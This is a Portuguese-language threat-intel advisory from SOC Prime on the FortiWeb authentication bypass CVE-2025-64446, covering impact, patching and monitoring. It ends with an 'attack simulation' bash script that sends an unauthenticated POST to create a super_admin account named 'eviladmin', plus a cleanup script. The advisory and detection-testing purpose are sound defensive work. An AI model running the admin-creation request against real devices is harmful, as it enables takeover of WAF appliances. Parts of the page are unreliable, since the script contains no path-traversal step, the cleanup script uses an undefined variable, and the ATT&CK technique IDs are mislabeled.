SOC Prime Bias: Crítico

19 Nov 2025 12:12
newspaper icon horizon3.ai

Vulnerabilidade de Bypass de Autenticação Fortinet FortiWeb via Path Traversal (CVE-2025-64446)

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Vulnerabilidade de Bypass de Autenticação Fortinet FortiWeb via Path Traversal (CVE-2025-64446)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

Uma vulnerabilidade crítica de autenticação bypass recentemente divulgada no FortiWeb da Fortinet, rastreada como CVE-2025-64446, permite que atacantes não autenticados criem contas administrativas através de uma solicitação de path-traversal manipulada. De acordo com relatórios publicamente disponíveis, a vulnerabilidade tem sido explorada ativamente desde o início de outubro de 2025 e foi posteriormente adicionada aos catálogos oficiais de ameaças devido à sua gravidade. A exploração bem-sucedida proporciona controle total sobre o appliance WAF afetado e pode permitir que agentes de ameaça se movam para redes internas mais profundas. A investigação inicial do CVE-2025-64446 indica que as tentativas de exploração continuam a visar dispositivos FortiWeb expostos à internet em larga escala.

Análise do CVE-2025-64446

O CVE-2025-64446 afeta várias versões do FortiWeb, permitindo que atacantes enviem uma solicitação HTTP POST maliciosa criada para o endpoint da API. A sequência de travessia de diretório possibilita acesso ao script CGI administrativo responsável pela criação de usuários. Isso resulta em uma nova conta de administrador no dispositivo, concedendo controle completo ao adversário. Como os dispositivos FortiWeb operam em estreita colaboração com outros produtos Fortinet, essa vulnerabilidade introduz uma maior exposição do ecossistema, significando que uma violação bem-sucedida poderia permitir que atacantes se movimentassem lateralmente e comprometesse sistemas e serviços conectados adicionais. Ataques anteriormente observados no FortiWeb (incluindo atividade em torno do CVE-2025-25257) reforçam a probabilidade de continuidade das investidas.

Mitigação

A Fortinet lançou patches para todas as versões afetadas. A mitigação imediata do CVE-2025-64446 requer a atualização para a última versão corrigida do produto, 8.0.2. As mitigações recomendadas incluem restringir o acesso à interface de gerenciamento a endereços IP confiáveis ou a uma VPN, impor MFA para acesso administrativo, rodar credenciais para todas as contas admin do FortiWeb, monitorar a atividade da API admin para eventos anômalos de criação de usuários e remover a exposição de gerenciamento HTTP/HTTPS da internet pública. As organizações também devem seguir procedimentos internos de teste de patch para evitar interrupção operacional.

Resposta

As equipes de segurança devem confirmar o inventário de versões, aplicar patches sem demora e desativar o acesso de gerenciamento externo se a atualização imediata não for possível. Dadas as tentativas de exploração ativas, é aconselhável intensificar o monitoramento para solicitações POST suspeitas direcionadas ao caminho da API vulnerável. Se contas existentes apresentarem alterações inesperadas, rotacionar credenciais e revisar logs de auditoria com mais frequência. Coletar IOCs do CVE-2025-64446, revisar padrões de tráfego e correlacioná-los com atividades recentes de exploração melhorará a visibilidade e reduzirá o risco.

Fluxo de Ataque

Ainda estamos atualizando esta parte. Inscreva-se para ser notificado

Notifique-me

Execução da Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Base deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa de Ataque e Comandos:

    1. Reconhecimento (T1016.001): O atacante descobre o IP público do appliance FortiWeb através de inteligência de código aberto.
    2. Colheita de Credenciais / Elevação de Privilégio (T1567.004): Usando o CVE‑2025‑64446 descoberto, o atacante cria uma carga útil POST maliciosa que cria um novo usuário admin com privilégios totais.
    3. Execução: O atacante envia a solicitação criada via HTTPS, garantindo que request_method seja POST e que o request_uri corresponda exatamente a/api/v2.0/cmdb/system/admin.

  • Script de Teste de Regressão:

    #!/usr/bin/env bash
# Explorar CVE-2025-64446 para criar uma nova conta admin no FortiWeb
# Ajustar variáveis conforme necessário para o ambiente-alvo

TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin"
NEW_USER="eviladmin"
NEW_PASS="P@ssw0rd!2025"
# A API vulnerável não requer autenticação para este endpoint (conforme CVE)
PAYLOAD=$(cat <<EOF
{
    "name": "${NEW_USER}",
    "password": "${NEW_PASS}",
    "privilege": "super_admin"
}
EOF
)

echo "[*] Enviando POST malicioso para ${TARGET}${ENDPOINT}"
curl -k -X POST "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -d "${PAYLOAD}" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Simulação de ataque completa."

  • Comandos de Limpeza:

    #!/usr/bin/env bash
# Remover a conta admin maliciosa criada durante o teste
TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"

echo "[*] Deletando conta admin de teste ${NEW_USER}"
curl -k -X DELETE "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Limpeza completa."

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e obter valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Junte-se Gratuitamente